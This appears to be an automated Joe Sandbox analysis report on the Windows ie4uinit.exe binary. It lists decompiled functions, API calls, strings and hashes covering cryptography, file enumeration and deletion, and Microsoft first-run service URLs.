Part of subcall function 00007FF7319DEA9C: CryptDeriveKey.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB3E
Part of subcall function 00007FF7319DEA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB48
Part of subcall function 00007FF7319DEA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB5C
Part of subcall function 00007FF7319DEA9C: CryptDestroyHash.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB84

Part of subcall function 00007FF7319DEA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB6B
Part of subcall function 00007FF7319DEA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB8C
Part of subcall function 00007FF7319DEA9C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEBA0

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

GetLastError.KERNEL32 ref: 00007FF7319DE91A

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Hash$memcpy_s$CreateDataDeriveDestroyEncryptHeapProcessRandom
String ID:
API String ID: 3055890878-0
Opcode ID: cd35a5b808a29304d299994369722c5ce30c78454dac310cd4c76ff622f3c001
Instruction ID: b2433a4a062b1e605b974edab101204d7c4cc4b323c30deb3a3e7e5ddc6f846a
Opcode Fuzzy Hash: cd35a5b808a29304d299994369722c5ce30c78454dac310cd4c76ff622f3c001
Instruction Fuzzy Hash: AA31B336F08B8297EB50AB25E44466AA3A0FF88794FD00035DB8D43B18DFBDE441D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C44E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7319C44E4(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a24, long long _a32) {
				void* _v8;
				signed int _v24;
				char _v572;
				void* _v616;
				void* _t18;
				signed long long _t23;
				signed long long _t24;
				void* _t44;

				_a24 = __rbx;
				_a32 = __rsi;
				_t23 =  *0x319f4658; // 0x8be7dd1f02a
				_t24 = _t23 ^ _t44 - 0x00000280;
				_v24 = _t24;
				if (SetCurrentDirectoryW(??) == 0) goto 0x319c455b;
				FindFirstFileW(??, ??);
				if (_t24 == 0xffffffff) goto 0x319c455b;
				_t5 =  &_v572; // 0x1e
				E00007FF77FF7319C3C10(_t24, __rcx, _t5);
				if (FindNextFileW(??, ??) != 0) goto 0x319c4533;
				FindClose(??);
				return E00007FF77FF7319E38D0(SetCurrentDirectoryW(??), _t18, _v24 ^ _t44 - 0x00000280);
			}

0x7ff7319c44e4
0x7ff7319c44e9
0x7ff7319c44f6
0x7ff7319c44fd
0x7ff7319c4500
0x7ff7319c4516
0x7ff7319c4524
0x7ff7319c4531
0x7ff7319c4533
0x7ff7319c453b
0x7ff7319c4550
0x7ff7319c4555
0x7ff7319c4588

APIs

SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C450E
FindFirstFileW.KERNEL32 ref: 00007FF7319C4524

Part of subcall function 00007FF7319C3C10: SetFileAttributesW.KERNEL32(?,00007FF7319C477E), ref: 00007FF7319C3C5D
Part of subcall function 00007FF7319C3C10: DeleteFileW.KERNEL32(?,00007FF7319C477E), ref: 00007FF7319C3C68
Part of subcall function 00007FF7319C3C10: SHChangeNotify.SHELL32 ref: 00007FF7319C3C7D

FindNextFileW.KERNEL32 ref: 00007FF7319C4548
FindClose.KERNEL32 ref: 00007FF7319C4555
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C455E

Strings

*.{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF7319C451D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: File$Find$CurrentDirectory$AttributesChangeCloseDeleteFirstNextNotify
String ID: *.{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 2401681968-4084126563
Opcode ID: f1bf1c671c6ef1bfb8823af4c72b8f41b03a8417693c673c4a2b3b410e5d7e6b
Instruction ID: c89f470c0679e65715920f9ef4f9c75ecd22fafba3a2fef7c2b3427f9bd3f2a3
Opcode Fuzzy Hash: f1bf1c671c6ef1bfb8823af4c72b8f41b03a8417693c673c4a2b3b410e5d7e6b
Instruction Fuzzy Hash: A1112421F0C6C1A1EB50AB15E444279B3A0FB48BA8FC49231D99D03798DF7CD5459720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D763C Relevance: 9.1, APIs: 6, Instructions: 80
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7319D763C(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long __rbp, long long* __r8, intOrPtr* __r9, char _a8, void* _a16, void* _a24) {
				long long _v40;
				long long _v48;
				long long _v56;
				long _t19;
				long _t21;
				long _t23;
				signed short _t26;
				void* _t29;
				signed int _t31;
				void* _t48;
				long long _t49;
				void* _t58;
				void* _t61;
				void* _t67;
				void* _t73;

				_t48 = _t67;
				 *((long long*)(_t48 + 0x10)) = __rbx;
				 *((long long*)(_t48 + 0x18)) = __rbp;
				 *((long long*)(_t48 + 8)) = __rcx;
				 *((long long*)(_t48 - 0x28)) = __rbx;
				 *((long long*)(_t48 - 0x30)) = __rbx;
				 *((intOrPtr*)(_t48 + 8)) = 0;
				_t49 = _t48 + 8;
				 *__r8 = __rbx;
				 *__r9 = 0;
				r8d = 0;
				r9d = 0;
				_v56 = _t49;
				__imp__CryptStringToBinaryW(_t73, _t58, _t61);
				if (__eax == 0) goto 0x319d771e;
				E00007FF77FF7319C1670();
				if (_t49 == 0) goto 0x319d7717;
				_v40 = __rbx;
				_v48 = __rbx;
				r8d = 0;
				_v56 =  &_a8;
				__imp__CryptStringToBinaryW();
				if (__eax == 0) goto 0x319d76d6;
				 *__r9 = _a8;
				 *__r8 = _t49;
				goto 0x319d7732;
				_t19 = GetLastError();
				_t20 =  ==  ? 1 : _t19;
				_t44 =  ==  ? 1 : _t19;
				if (( ==  ? 1 : _t19) > 0) goto 0x319d76f9;
				_t21 = GetLastError();
				_t22 =  ==  ? 1 : _t21;
				_t29 =  ==  ? 1 : _t21;
				goto 0x319d770d;
				_t23 = GetLastError();
				_t24 =  ==  ? 1 : _t23;
				_t30 = ( ==  ? 1 : _t23) & 0x0000ffff;
				_t31 = ( ==  ? 1 : _t23) & 0x0000ffff | 0x80070000;
				E00007FF77FF7319C1698( &_a8, _t49);
				goto 0x319d7732;
				goto 0x319d7732;
				_t26 = GetLastError();
				_t35 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
				_t27 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
				return  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
			}

0x7ff7319d763c
0x7ff7319d763f
0x7ff7319d7643
0x7ff7319d7647
0x7ff7319d7658
0x7ff7319d765f
0x7ff7319d7666
0x7ff7319d7669
0x7ff7319d766d
0x7ff7319d7672
0x7ff7319d7675
0x7ff7319d7678
0x7ff7319d767b
0x7ff7319d7683
0x7ff7319d768b
0x7ff7319d7695
0x7ff7319d76a0
0x7ff7319d76a2
0x7ff7319d76ac
0x7ff7319d76b4
0x7ff7319d76b7
0x7ff7319d76c1
0x7ff7319d76c9
0x7ff7319d76cf
0x7ff7319d76d1
0x7ff7319d76d4
0x7ff7319d76d6
0x7ff7319d76e3
0x7ff7319d76e6
0x7ff7319d76e8
0x7ff7319d76ea
0x7ff7319d76f2
0x7ff7319d76f5
0x7ff7319d76f7
0x7ff7319d76f9
0x7ff7319d7701
0x7ff7319d7704
0x7ff7319d7707
0x7ff7319d7710
0x7ff7319d7715
0x7ff7319d771c
0x7ff7319d771e
0x7ff7319d772f
0x7ff7319d7737
0x7ff7319d7746

APIs

CryptStringToBinaryW.CRYPT32 ref: 00007FF7319D7683
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF7319D79B1), ref: 00007FF7319D771E

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

CryptStringToBinaryW.CRYPT32 ref: 00007FF7319D76C1
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF7319D79B1), ref: 00007FF7319D76D6
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00007FF7319D79B1), ref: 00007FF7319D76EA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$BinaryCryptString$HeapProcess
String ID:
API String ID: 3231478326-0
Opcode ID: d19f66ab0da86e25717549e9acd116a2d5483bc06ee371277d1c82c0e560c553
Instruction ID: e4b1d110ce3b98665d7c7933373b57498239a9944b81432732a0d6752848c259
Opcode Fuzzy Hash: d19f66ab0da86e25717549e9acd116a2d5483bc06ee371277d1c82c0e560c553
Instruction Fuzzy Hash: 7531C932F08B8196E710AF65A984669B3D4BF44B94F994034DE8D83718DEBCE440D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D2B50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00007FF77FF7319D2B50(void* __edx, void* __rcx, long long __r8) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t9;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t23;
				intOrPtr _t25;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t39;

				if (__edx != 0) goto 0x319d2b66;
				goto 0x319d2b74;
				_t29 =  !=  ? 0x319e8be4 : 0x319ec068;
				_t25 =  *((intOrPtr*)(__rcx + 0x10));
				goto 0x319d5f0c;
				asm("int3");
				asm("int3");
				asm("int3");
				r8d = 0;
				if (__edx != 0) goto 0x319d2b9b;
				goto 0x319d2ba9;
				_t22 =  !=  ? 0x319e8be4 : 0x319ec068;
				_v16 = __r8;
				_v24 = __r8;
				_v32 = __r8;
				_v40 =  !=  ? 0x319e8be4 : 0x319ec068;
				return E00007FF77FF7319D716C(_t9, _t10, 0, _t13, _t14, 0, _t23,  *((intOrPtr*)(_t25 + 0x10)), _t29, _t30, _t31, __r8, L"https://ieonline.microsoft.com/EUPP/v1/service?action=setfirstruncomplete&appid=Microsoft_IE_EUPP", _t39);
			}

0x7ff7319d2b5b
0x7ff7319d2b64
0x7ff7319d2b70
0x7ff7319d2b74
0x7ff7319d2b78
0x7ff7319d2b7d
0x7ff7319d2b7e
0x7ff7319d2b7f
0x7ff7319d2b84
0x7ff7319d2b90
0x7ff7319d2b99
0x7ff7319d2ba5
0x7ff7319d2bb4
0x7ff7319d2bbb
0x7ff7319d2bc0
0x7ff7319d2bc5
0x7ff7319d2bd3

APIs

CryptGenRandom.ADVAPI32 ref: 00007FF7319D5F65
GetLastError.KERNEL32 ref: 00007FF7319D5F6F

Strings

dsp, xrefs: 00007FF7319D2B69
https://ieonline.microsoft.com/EUPP/v1/service?action=needfirstrun&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D5F98

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CryptErrorLastRandom
String ID: dsp$https://ieonline.microsoft.com/EUPP/v1/service?action=needfirstrun&appid=Microsoft_IE_EUPP
API String ID: 1176002950-197285457
Opcode ID: aad2aff617bec0a7cf2545ca9d18dd7df884f284a2e0012892b6761f194f1e11
Instruction ID: 0ae332c6c2fda2042b7891d2342c27228e8982125f4654152994db3ae29ae963
Opcode Fuzzy Hash: aad2aff617bec0a7cf2545ca9d18dd7df884f284a2e0012892b6761f194f1e11
Instruction Fuzzy Hash: 3E515823F18A82AAFB10EF66D4043ADA3B5AB48788F844136DE4D47648DFBCE405D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D7DCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7319D7E31
CryptHashCertificate.CRYPT32 ref: 00007FF7319D7E70
memcmp.MSVCRT ref: 00007FF7319D7E9E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,80004005,00007FF7319D7D21), ref: 00007FF7319D7EB4

Strings

, xrefs: 00007FF7319D7E7A

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CertificateCryptErrorHashLastmemcmpmemset
String ID:
API String ID: 2710184173-3916222277
Opcode ID: dd4ecaff4ee33ae978393551f6ac5030382da12282ae5f96ce52156916286347
Instruction ID: 8b53ad9ab1fa49cda9559128e122f381b47bf58cb15f993c3ac97138e30202d3
Opcode Fuzzy Hash: dd4ecaff4ee33ae978393551f6ac5030382da12282ae5f96ce52156916286347
Instruction Fuzzy Hash: D0319037B08B91D6EB54DB15E844269B3A0FB88B88F904136DE4D83768DF7CE841DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DE750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7319DE750(long long __rbx, void* __rcx, long long _a8) {
				intOrPtr _v24;
				void* _t9;
				long _t12;
				long _t15;
				void* _t22;
				void* _t43;
				void* _t44;
				void* _t45;

				_t35 = __rbx;
				_a8 = __rbx;
				_t43 = __rcx;
				if (( *0x319f4ec0 & 0x00000008) == 0) goto 0x319de772;
				_t9 = E00007FF77FF7319DE6C8( *0x319f4ec0 & 0x00000008);
				_v24 = 0xf0000000;
				r9d = 0x18;
				__imp__CryptAcquireContextW();
				if (_t9 == 0) goto 0x319de7b1;
				if (E00007FF77FF7319DE950(__rbx, _t43, _t44, _t45) < 0) goto 0x319de7e8;
				E00007FF77FF7319DE80C(_t10, _t35, _t43, _t44);
				goto 0x319de7e8;
				_t12 = GetLastError();
				_t13 =  ==  ? 1 : _t12;
				_t31 =  ==  ? 1 : _t12;
				if (( ==  ? 1 : _t12) > 0) goto 0x319de7d4;
				_t22 =  ==  ? 1 : GetLastError();
				goto 0x319de7e8;
				_t15 = GetLastError();
				_t16 =  ==  ? 1 : _t15;
				_t23 = ( ==  ? 1 : _t15) & 0x0000ffff;
				_t24 = ( ==  ? 1 : _t15) & 0x0000ffff | 0x80070000;
				if (( *0x319f4ec0 & 0x00000008) == 0) goto 0x319de7fd;
				E00007FF77FF7319DE6C8( *0x319f4ec0 & 0x00000008);
				_t18 = ( ==  ? 1 : _t15) & 0x0000ffff | 0x80070000;
				return ( ==  ? 1 : _t15) & 0x0000ffff | 0x80070000;
			}

0x7ff7319de750
0x7ff7319de750
0x7ff7319de761
0x7ff7319de764
0x7ff7319de76d
0x7ff7319de776
0x7ff7319de77e
0x7ff7319de78d
0x7ff7319de795
0x7ff7319de7a3
0x7ff7319de7a8
0x7ff7319de7af
0x7ff7319de7b1
0x7ff7319de7be
0x7ff7319de7c1
0x7ff7319de7c3
0x7ff7319de7cf
0x7ff7319de7d2
0x7ff7319de7d4
0x7ff7319de7dc
0x7ff7319de7df
0x7ff7319de7e2
0x7ff7319de7ef
0x7ff7319de7f8
0x7ff7319de7fd
0x7ff7319de809

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF7319DE78D
GetLastError.KERNEL32 ref: 00007FF7319DE7B1
GetLastError.KERNEL32 ref: 00007FF7319DE7C5
GetLastError.KERNEL32 ref: 00007FF7319DE7D4

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00007FF7319DE784

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$AcquireContextCrypt
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 515889935-63410773
Opcode ID: 8ac2b268588cf12d4238ff2465cd1088c530efc73a41aada4d763c07ee38a1e6
Instruction ID: 435df352b2bfece6c485be059cd4bad0bcaa4190d50244745967ae7dd5c369c0
Opcode Fuzzy Hash: 8ac2b268588cf12d4238ff2465cd1088c530efc73a41aada4d763c07ee38a1e6
Instruction Fuzzy Hash: 0D114C32F0D6C7A9F780BB25A9883B993916F44B48FC84434D94D861A9DFEDE455A330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0204 Relevance: 7.6, APIs: 5, Instructions: 109
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00007FF77FF7319E0204(void* __esi, void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r10) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t37;
				void* _t52;
				intOrPtr _t65;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				signed long long _t86;
				signed long long _t87;
				WCHAR* _t104;
				signed long long _t105;
				union _FINDEX_INFO_LEVELS _t107;
				void* _t109;
				void* _t110;
				void* _t112;
				signed long long _t113;

				_t100 = __rdx;
				_t88 = __rbx;
				 *((long long*)(_t112 + 0x18)) = __rbx;
				_t110 = _t112 - 0x5d0;
				_t113 = _t112 - 0x6d0;
				_t86 =  *0x319f4658; // 0x8be7dd1f02a
				_t87 = _t86 ^ _t113;
				 *(_t110 + 0x5c0) = _t87;
				 *((long long*)(_t113 + 0x38)) = __rdx;
				 *((long long*)(_t113 + 0x40)) = __rcx;
				if (E00007FF77FF7319C90F4(__esi, _t110 + 0x1a0, __rdx, __rcx, "*", __r10) < 0) goto 0x319e0398;
				 *(_t113 + 0x28) =  *(_t113 + 0x28) & 0x00000000;
				 *(_t113 + 0x20) =  *(_t113 + 0x20) & 0x00000000;
				r9d = 0;
				FindFirstFileExW(_t104, _t107, _t109);
				_t105 = _t87;
				if (_t87 != 0xffffffff) goto 0x319e029c;
				_t52 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
				 *((char*)(_t113 + 0x30)) = 0;
				goto 0x319e0381;
				if (0 != 0) goto 0x319e0389;
				_t65 =  *((intOrPtr*)(_t113 + 0x50));
				if ((sil & 0x00000010) == 0) goto 0x319e032e;
				_t60 =  *(_t113 + 0x7c) & 0x0000ffff;
				_t72 = _t60 - "."; // 0x2e
				_t37 =  *(_t113 + 0x7e) & 0x0000ffff;
				if (_t72 != 0) goto 0x319e02d7;
				_t73 = _t37 -  *0x319e8efa; // 0x0
				if (_t73 == 0) goto 0x319e0347;
				_t74 = _t60 - L".."; // 0x2e
				if (_t74 != 0) goto 0x319e02f6;
				_t75 = _t37 -  *0x319e8efe; // 0x2e
				if (_t75 != 0) goto 0x319e02f6;
				_t76 = ( *(_t110 - 0x80) & 0x0000ffff) -  *0x319e8f00; // 0x0
				if (_t76 == 0) goto 0x319e0347;
				if (E00007FF77FF7319C90F4(_t65, _t110 + 0x3b0, _t100,  *((intOrPtr*)(_t113 + 0x40)), _t113 + 0x7c, __r10) < 0) goto 0x319e0347;
				if (E00007FF77FF7319E0204(_t65, E00007FF77FF7319C90F4(_t65, _t110 + 0x3b0, _t100,  *((intOrPtr*)(_t113 + 0x40)), _t113 + 0x7c, __r10), __rbx, _t110 + 0x3b0,  *((intOrPtr*)(_t113 + 0x38)), __r10) < 0) goto 0x319e0347;
				r8d = _t65;
				if (E00007FF77FF7319E00F4(_t88,  *((intOrPtr*)(_t113 + 0x40)), _t113 + 0x7c, _t105, _t107, _t110,  *((intOrPtr*)(_t113 + 0x38))) < 0) goto 0x319e0389;
				if (FindNextFileW(??, ??) != 0) goto 0x319e037d;
				if (GetLastError() != 0x12) goto 0x319e036f;
				goto 0x319e029e;
				_t59 =  <=  ? 1 : 0x80070001;
				if (( <=  ? 1 : 0x80070001) >= 0) goto 0x319e02a7;
				if (_t105 == 0xffffffff) goto 0x319e0398;
				FindClose(??);
				return E00007FF77FF7319E38D0( <=  ? 1 : 0x80070001,  *(_t113 + 0x7c) & 0x0000ffff,  *(_t110 + 0x5c0) ^ _t113);
			}

0x7ff7319e0204
0x7ff7319e0204
0x7ff7319e0204
0x7ff7319e020c
0x7ff7319e0214
0x7ff7319e021b
0x7ff7319e0222
0x7ff7319e0225
0x7ff7319e022c
0x7ff7319e0238
0x7ff7319e0255
0x7ff7319e025b
0x7ff7319e0265
0x7ff7319e0272
0x7ff7319e0279
0x7ff7319e027f
0x7ff7319e0286
0x7ff7319e0299
0x7ff7319e029e
0x7ff7319e02a2
0x7ff7319e02a9
0x7ff7319e02af
0x7ff7319e02b7
0x7ff7319e02b9
0x7ff7319e02c0
0x7ff7319e02c7
0x7ff7319e02cc
0x7ff7319e02ce
0x7ff7319e02d5
0x7ff7319e02d7
0x7ff7319e02de
0x7ff7319e02e0
0x7ff7319e02e7
0x7ff7319e02ed
0x7ff7319e02f4
0x7ff7319e0315
0x7ff7319e032c
0x7ff7319e033d
0x7ff7319e0349
0x7ff7319e035b
0x7ff7319e0366
0x7ff7319e036a
0x7ff7319e037a
0x7ff7319e0383
0x7ff7319e038d
0x7ff7319e0392
0x7ff7319e03bb

APIs

Part of subcall function 00007FF7319C90F4: LocalFree.KERNEL32 ref: 00007FF7319C9312

FindFirstFileExW.KERNEL32 ref: 00007FF7319E0279
GetLastError.KERNEL32 ref: 00007FF7319E0288
FindNextFileW.KERNEL32 ref: 00007FF7319E0353
GetLastError.KERNEL32 ref: 00007FF7319E035D
FindClose.KERNEL32 ref: 00007FF7319E0392

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstFreeLocalNext
String ID:
API String ID: 2978595652-0
Opcode ID: b82eed9b9ad028baa882b3f5c7fe9305f8cbf1c90736e26fe2ca5e54320822eb
Instruction ID: 2bcbf58563e197538ade6521ed28e33371b6d19885a2be7ca2030e1f1f1f20b7
Opcode Fuzzy Hash: b82eed9b9ad028baa882b3f5c7fe9305f8cbf1c90736e26fe2ca5e54320822eb
Instruction Fuzzy Hash: 34414221F0C6C2A6E710BB65E4403BAA390BB4576CFC59131DA9D4659CDFACE544D730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C7758 Relevance: 6.2, APIs: 4, Instructions: 241threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7319C7859
memset.MSVCRT ref: 00007FF7319C78A8
IsDebuggerPresent.KERNEL32 ref: 00007FF7319C794A
OutputDebugStringW.KERNEL32 ref: 00007FF7319C79D7

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThreadmemset
String ID:
API String ID: 3402966819-0
Opcode ID: 8115dcb7fee6dcef3782b57c650c0587db40e5c68cf5ca962254d4a6c13c2ef5
Instruction ID: c9f9561b222e8710ace890d98ae38198d249f2dad2fc8a220c4af92663756f0c
Opcode Fuzzy Hash: 8115dcb7fee6dcef3782b57c650c0587db40e5c68cf5ca962254d4a6c13c2ef5
Instruction Fuzzy Hash: 4BB16372E0D7C2A1EB65AB15A840369B7A0FB84B88F844035D9CD47798DFBCE444EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D22C8 Relevance: 6.1, APIs: 4, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00007FF77FF7319D22C8(long long __rbx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8, void* __r9, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v24;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v56;
				void* __rbp;
				void* _t40;
				void* _t64;
				void* _t70;
				void* _t73;
				long long* _t74;
				signed int* _t77;
				void* _t81;
				long long* _t93;
				void* _t94;
				long long _t96;
				void* _t101;
				void* _t104;
				signed int* _t108;
				long long _t117;

				_t98 = __rsi;
				_t96 = __rdi;
				_t73 = _t104;
				 *((long long*)(_t73 + 8)) = __rbx;
				 *((long long*)(_t73 + 0x10)) = __rsi;
				 *((long long*)(_t73 + 0x18)) = __rdi;
				 *((long long*)(_t73 + 0x20)) = __r14;
				_t77 = __rdx;
